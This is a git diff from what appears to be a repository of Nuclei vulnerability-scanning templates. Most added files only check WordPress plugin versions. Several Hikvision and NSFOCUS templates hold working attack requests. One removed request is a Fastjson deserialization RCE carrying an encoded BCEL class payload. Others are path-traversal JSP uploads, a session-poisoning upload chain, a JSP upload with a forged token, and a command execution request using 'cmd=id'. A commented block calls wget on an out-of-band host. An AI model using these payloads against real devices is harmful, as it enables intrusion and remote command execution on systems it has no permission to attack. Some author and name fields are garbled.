td-composer-a84bf528fd8a808bc88b049d18e64cda + +info: + name: > + tagDiv Composer <= 5.0 - Reflected Cross-Site Scripting via envato_code[] + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db95415a-5354-498b-8368-58c47d9948de?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/td-composer/" + google-query: inurl:"/wp-content/plugins/td-composer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,td-composer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/td-composer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "td-composer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0') \ No newline at end of file diff --git a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml index 0ebd67934b..7e328a8b1b 100644 --- a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml +++ b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml @@ -1,27 +1,50 @@ id: HIKVISION info: - name: HIKVISION - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: - fofa-query: app="HIKVISION-综合安防管理平台" - hunter-query: web.title="综合安防管理平台" + fofa-query: icon_hash="-911494769" + hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" +variables: + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' + http: - raw: - | - POST /bic/ssoService/v1/applyCT HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - Content-Type: application/json - Testcmd: whoami - - {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" + Content-Type: image/jpeg + + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- + + - | + GET /eps/upload/{{name}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: name + json: + - ".data.resourceUuid" + internal: true matchers: - type: word words: - - "nt authority\\system" + - '{{randstr}}' diff --git a/poc/sql/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml b/poc/sql/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml new file mode 100644 index 0000000000..25665a01fa --- /dev/null +++ b/poc/sql/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc + +info: + name: > + WPZOOM Portfolio Lite – Filterable Portfolio Plugin <= 1.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute + author: topscoder + severity: low + description: > + The WPZOOM Portfolio Lite – Filterable Portfolio Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘align’ attribute within the 'wp:wpzoom-blocks' Gutenberg block in all versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2e7d5503-0a6e-4611-bb7c-b2871be828be?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8276 + metadata: + fofa-query: "wp-content/plugins/wpzoom-portfolio/" + google-query: inurl:"/wp-content/plugins/wpzoom-portfolio/" + shodan-query: 'vuln:CVE-2024-8276' + tags: cve,wordpress,wp-plugin,wpzoom-portfolio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpzoom-portfolio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpzoom-portfolio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml index 538f6fd6d5..cd961f6e81 100644 --- a/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml +++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml @@ -1,35 +1,27 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high + name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability + author: zerZero Trust Security Attack and Defense Laboratoryo + severity: medium description: | - HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability + There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks metadata: - fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" - http: - - raw: - - | - POST /center/api/files;.html HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - - ------WebKitFormBoundary9PggsiM755PLa54a - Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" - Content-Type: application/zip - - <%out.print("test");%> + - method: GET + path: + - "{{BaseURL}}/artemis-portal/artemis/env" - ------WebKitFormBoundary9PggsiM755PLa54a-- - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "test.jsp")' - condition: and + - type: word + part: body + words: + - "profiles" + + - type: status + status: + - 200 diff --git a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml index a8f9cbe173..b35ef84818 100644 --- a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml +++ b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml @@ -1,59 +1,49 @@ id: Green-Alliance info: - name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability + name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets + Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability metadata: - fofa-query: app="NSFOCUS-下一代防火墙" - hunter-query: web.title="用户认证 - NSFOCUS NF" - + fofa-query: body="'/needUsbkey.php?username='" + hunter-query: web.body="'/needUsbkey.php?username='" http: - - raw: - - | - POST /api/v1/device/bugsInfo HTTP/1.1 - Host: {{Host}}:8081 - Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 238 - Accept-Encoding: gzip, deflate - Connection: close - - --1d52ba2a11ad8a915eddab1a0e85acd9 - Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72" - - lang|s:52:"../../../../../../../../../../../../../../../../tmp/"; - --1d52ba2a11ad8a915eddab1a0e85acd9-- - - - | - POST /api/v1/device/bugsInfo HTTP/1.1 - Host: {{Host}}:8081 - Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 217 - Accept-Encoding: gzip, deflate - Connection: close - - --4803b59d015026999b45993b1245f0ef - Content-Disposition: form-data; name="file"; filename="compose.php" - - - --4803b59d015026999b45993b1245f0ef-- - - - | - GET /mail/include/header_main.php HTTP/1.1 - Host: {{Host}}:4433 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 - Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72 + - method: GET + path: + - "{{BaseURL}}/webconf/Exec/index?cmd=id" + matchers-condition: and matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && contains(body_1, 'upload file success')" - - "status_code_2 == 200 && contains(body_2, 'upload file success')" - - "status_code_3 == 200 && contains(body_3, '{{randstr}}')" - condition: and + - type: word + part: body + words: + - "200" + + - type: status + status: + - 200 + + +# http: +# - method: GET +# path: +# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}" + +# attack: clusterbomb +# matchers-condition: or +# matchers: +# - type: word +# part: interactsh_protocol +# name: http +# words: +# - "http" + +# - type: word +# part: interactsh_protocol +# name: dns +# words: +# - "dns" diff --git a/poc/web/web-application-firewall-aecd7866e19c9efd3d56871b357c8881.yaml b/poc/web/web-application-firewall-aecd7866e19c9efd3d56871b357c8881.yaml new file mode 100644 index 0000000000..fd4052d4c9 --- /dev/null +++ b/poc/web/web-application-firewall-aecd7866e19c9efd3d56871b357c8881.yaml @@ -0,0 +1,59 @@ +id: web-application-firewall-aecd7866e19c9efd3d56871b357c8881 + +info: + name: > + Web Application Firewall <= 2.1.2 - IP Address Spoofing to Protection Mechanism Bypass + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e99531c-8742-4f91-8525-65bb3cb06644?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/web-application-firewall/" + google-query: inurl:"/wp-content/plugins/web-application-firewall/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,web-application-firewall,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/web-application-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "web-application-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.2') \ No newline at end of file diff --git a/poc/wordpress/ip-vault-wp-firewall-5048b84b845dea0b88ed33d7dc34347e.yaml b/poc/wordpress/ip-vault-wp-firewall-5048b84b845dea0b88ed33d7dc34347e.yaml new file mode 100644 index 0000000000..bd683463e6 --- /dev/null +++ b/poc/wordpress/ip-vault-wp-firewall-5048b84b845dea0b88ed33d7dc34347e.yaml @@ -0,0 +1,59 @@ +id: ip-vault-wp-firewall-5048b84b845dea0b88ed33d7dc34347e + +info: + name: > + IP Vault – WP Firewall <= 1.1 - IP Address Spoofing to Protection Mechanism Bypass + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/66e89753-f83e-4e60-b165-6d3d101d6c59?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ip-vault-wp-firewall/" + google-query: inurl:"/wp-content/plugins/ip-vault-wp-firewall/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ip-vault-wp-firewall,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ip-vault-wp-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ip-vault-wp-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/wordpress/wp-cerber-4a64f9ad31b78ab78c48428c5a85590b.yaml b/poc/wordpress/wp-cerber-4a64f9ad31b78ab78c48428c5a85590b.yaml new file mode 100644 index 0000000000..257f35c6b6 --- /dev/null +++ b/poc/wordpress/wp-cerber-4a64f9ad31b78ab78c48428c5a85590b.yaml @@ -0,0 +1,59 @@ +id: wp-cerber-4a64f9ad31b78ab78c48428c5a85590b + +info: + name: > + WP Cerber Security <= 9.4 - IP Protection Bypass + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/03ccd474-42f4-4cbb-823e-93fe4db1bf80?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-cerber/" + google-query: inurl:"/wp-content/plugins/wp-cerber/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-cerber,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-cerber/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-cerber" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.4') \ No newline at end of file diff --git a/poc/wordpress/wp-events-manager-29722e1d187e63b6b325ae129c9c70d3.yaml b/poc/wordpress/wp-events-manager-29722e1d187e63b6b325ae129c9c70d3.yaml new file mode 100644 index 0000000000..27678d7964 --- /dev/null +++ b/poc/wordpress/wp-events-manager-29722e1d187e63b6b325ae129c9c70d3.yaml @@ -0,0 +1,59 @@ +id: wp-events-manager-29722e1d187e63b6b325ae129c9c70d3 + +info: + name: > + WP Events Manager <= 2.1.11 - Authenticated (Subscriber+) Time-Based SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/88dc08ff-3966-4606-855c-57c25552599e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-events-manager/" + google-query: inurl:"/wp-content/plugins/wp-events-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-events-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-events-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-events-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.11') \ No newline at end of file diff --git a/poc/wordpress/wpzoom-portfolio-dcf59e219d34d9e2d14f575ceb25f541.yaml b/poc/wordpress/wpzoom-portfolio-dcf59e219d34d9e2d14f575ceb25f541.yaml new file mode 100644 index 0000000000..17a01e4d56 --- /dev/null +++ b/poc/wordpress/wpzoom-portfolio-dcf59e219d34d9e2d14f575ceb25f541.yaml @@ -0,0 +1,59 @@ +id: wpzoom-portfolio-dcf59e219d34d9e2d14f575ceb25f541 + +info: + name: > + WPZOOM Portfolio Lite – Filterable Portfolio Plugin <= 1.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2e7d5503-0a6e-4611-bb7c-b2871be828be?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wpzoom-portfolio/" + google-query: inurl:"/wp-content/plugins/wpzoom-portfolio/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wpzoom-portfolio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpzoom-portfolio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpzoom-portfolio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file